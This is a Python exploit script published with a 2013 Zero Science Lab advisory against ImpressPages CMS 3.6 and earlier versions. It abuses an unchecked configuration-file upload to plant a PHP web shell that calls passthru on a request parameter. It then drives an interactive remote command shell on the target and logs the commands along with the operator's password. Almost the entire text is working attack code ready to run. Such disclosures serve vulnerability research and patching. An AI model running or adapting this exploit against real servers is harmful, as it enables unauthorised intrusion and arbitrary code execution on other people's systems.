#!/usr/bin/python # # # ImpressPages CMS v3.6 manage() Function Remote Code Execution Exploit # # # Vendor: ImpressPages UAB # Product web page: http://www.impresspages.org # Affected version: 3.6, 3.5 and 3.1 # # Summary: ImpressPages CMS is an open source web content management system with # revolutionary drag & drop interface. # # Desc: The vulnerability is caused due to the improper verification of uploaded # files in '/ip_cms/modules/developer/config_exp_imp/manager.php' script thru the # 'manage()' function (@line 65) when importing a configuration file. This can be # exploited to execute arbitrary PHP code by uploading a malicious PHP script file # that will be stored in '/file/tmp' directory after successful injection. # Permission Developer[Modules exp/imp] is required (parameter 'i_n_2[361]' = on) # for successful exploitation. # # Tested on: Microsoft Windows 7 Ultimate SP1 (EN) # GNU/Linux CentOS 6.3 (Final) # Apache 2.4.2 (Win32) / Apache2 # PHP 5.4.7 / PHP 5.3.21 # MySQL 5.5.25a # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # # Zero Science Lab - http://www.zeroscience.mk # Macedonian Information Security Research And Development Laboratory # # # Advisory ID: ZSL-2013-5159 # Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2013-5159.php # # Vendor: http://www.impresspages.org/blog/impresspages-cms-3-7-is-mobile-as-never-before/ # # # 12.10.2013 # ver = '1.0.0.000251' import itertools, mimetools, mimetypes import cookielib, urllib, urllib2, sys import logging, os, time, datetime, re from colorama import Fore, Back, Style, init from cStringIO import StringIO from urllib2 import URLError init() if os.name == 'posix': os.system('clear') if os.name == 'nt': os.system('cls') piton = os.path.basename(sys.argv[0]) def bannerche(): print """ @---------------------------------------------------------------@ | | | ImpressPages CMS 3.6 RCE 0day | | | | | | ID: ZSL-2013-5159 | | | | Copyleft (c) 2013, Zero Science Lab | | | @---------------------------------------------------------------@ """ if len(sys.argv) < 3: print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' \n' print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk impresspages\n' sys.exit() bannerche() print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET host = sys.argv[1] path = sys.argv[2] cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) try: opener.open('http://'+host+'/'+path+'/admin.php') except urllib2.HTTPError, errorzio: if errorzio.code == 404: print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET sys.exit() except URLError, errorziocvaj: if errorziocvaj.reason: print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET sys.exit() print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET token_chk = opener.open('http://'+host+'/'+path+'/admin.php') response = token_chk.read() match = re.search('(?<=security_token=)\w+', response) sectoken = match.group(0) print '\x20\x20[*] Login please.' username = raw_input('\x20\x20[*] Enter username: ') password = raw_input('\x20\x20[*] Enter password: ') login_data = urllib.urlencode({ 'f_name' : username, 'f_pass' : password, 'action' : 'login' }) login = opener.open('http://'+host+'/'+path+'/admin.php?action=login&security_token='+sectoken, login_data) auth = login.read() for session in cj: sessid = session.name ses_chk = re.search(r'%s=\w+' % sessid , str(cj)) cookie = ses_chk.group(0) print '\x20\x20[*] Mapping Session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET+'\x20'+'.'*(46 - len(cookie))+Fore.GREEN+'[OK]'+Fore.RESET print '\x20\x20[*] Mapping security token '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET print '\x20\x20[*] Token: '+Fore.YELLOW+sectoken+Fore.RESET+'\x20'+'.'*15+Fore.GREEN+'[OK]'+Fore.RESET if re.search(r'Incorrect name or password', auth): print '\x20\x20[*] Faulty credentials given '+'.'*30+Fore.RED+'[ER]'+Fore.RESET sys.exit() elif re.search(r'Your login suspended for one hour', auth): print '\x20\x20[*] Your username is suspended for 1 hour '+'.'*17+Fore.RED+'[ER]'+Fore.RESET sys.exit() else: print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET class MultiPartForm(object): def __init__(self): self.form_fields = [] self.files = [] self.boundary = mimetools.choose_boundary() return def get_content_type(self): return 'multipart/form-data; boundary=%s' % self.boundary def add_field(self, name, value): self.form_fields.append((name, value)) return def add_file(self, fieldname, filename, fileHandle, mimetype=None): body = fileHandle.read() if mimetype is None: mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' self.files.append((fieldname, filename, mimetype, body)) return def __str__(self): parts = [] part_boundary = '--' + self.boundary parts.extend( [ part_boundary, 'Content-Disposition: form-data; name="%s"' % name, '', value, ] for name, value in self.form_fields ) parts.extend( [ part_boundary, 'Content-Disposition: file; name="%s"; filename="%s"' % \ (field_name, filename), 'Content-Type: %s' % content_type, '', body, ] for field_name, filename, content_type, body in self.files ) flattened = list(itertools.chain(*parts)) flattened.append('--' + self.boundary + '--') flattened.append('') return '\r\n'.join(flattened) if __name__ == '__main__': form = MultiPartForm() form.add_field('spec_security_code', '12345678901234567890123456789012') form.add_field('spec_rand_name', 'lib_php_form_standard_1_') form.add_file('config', 'liwo.php', fileHandle=StringIO('\"; passthru($_GET[\'cmd\']); echo \"\"; ?>')) request = urllib2.Request('http://'+host+'/'+path+'/admin.php?module_id=361&action=import&security_token='+sectoken) request.add_header('User-agent', 'joxypoxy 1.0') body = str(form) request.add_header('Content-type', form.get_content_type()) request.add_header('Cookie', cookie) request.add_header('Content-length', len(body)) request.add_data(body) request.get_data() urllib2.urlopen(request).read() print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET time.sleep(1) furl = '/admin.php?module_id=361&action=import_uploaded&security_token=' def osys(): cmd = 'uname' execute = opener.open('http://'+host+'/'+path+furl+sectoken+'&cmd='+urllib.quote(cmd)) reverse = execute.read() if re.search(r'Linux', reverse, re.IGNORECASE): cmd = 'pwd' print Style.DIM+Fore.WHITE print '\n\x20\x20[*] Coins: 1' print '\x20\x20[*] Detected platform: Linux' print '\x20\x20[*] Type \'exit\' to leave' print '\x20\x20[*] Choose your CMDs wisely' print '\x20\x20[*] Your current location:' print Style.RESET_ALL+Fore.RESET return cmd else: cmd = 'cd' print Style.DIM+Fore.WHITE print '\n\x20\x20[*] Coins: 1' print '\x20\x20[*] Detected platform: Windows' print '\x20\x20[*] Type \'exit\' to leave' print '\x20\x20[*] Choose your CMDs wisely' print '\x20\x20[*] Your current location:' print Style.RESET_ALL+Fore.RESET return cmd print today = datetime.date.today() fname = 'impress-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log' logging.basicConfig(filename=fname,level=logging.DEBUG) logging.info(' '+'+'*75) logging.info(' +') logging.info(' + Log generated on: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')) logging.info(' + Title: ImpressPages CMS 3.6 manage() Function Remote Code Execution') logging.info(' + Python program executed: '+sys.argv[0]) logging.info(' + Version: '+ver) logging.info(' + Full query: \''+piton+'\x20'+host+'\x20'+path+'\'') logging.info(' + Username input: '+username) logging.info(' + Password input: '+password) logging.info(' + Vector: '+'http://'+host+'/'+path+furl+sectoken) logging.info(' +') logging.info(' + Advisory ID: ZSL-2013-5159') logging.info(' + Zero Science Lab - http://www.zeroscience.mk') logging.info(' +') logging.info(' '+'+'*75+'\n') print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET while True: try: cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET) if cmd.strip() == '': cmd = osys() execute = opener.open('http://'+host+'/'+path+furl+sectoken+'&cmd='+urllib.quote(cmd)) reverse = execute.read() pattern = re.compile(r'
(.*?)
',re.S|re.M) print Style.BRIGHT+Fore.CYAN cmdout = pattern.match(reverse) print cmdout.groups()[0].strip() print Style.RESET_ALL+Fore.RESET if cmd.strip() == 'exit': break logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n') except Exception: break logging.warning('\n\n END OF LOG') print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET print '\x20\x20[*] File '+Fore.YELLOW+fname+Fore.RESET+'\x20'+'.'*19+Fore.GREEN+'[OK]'+Fore.RESET sys.exit()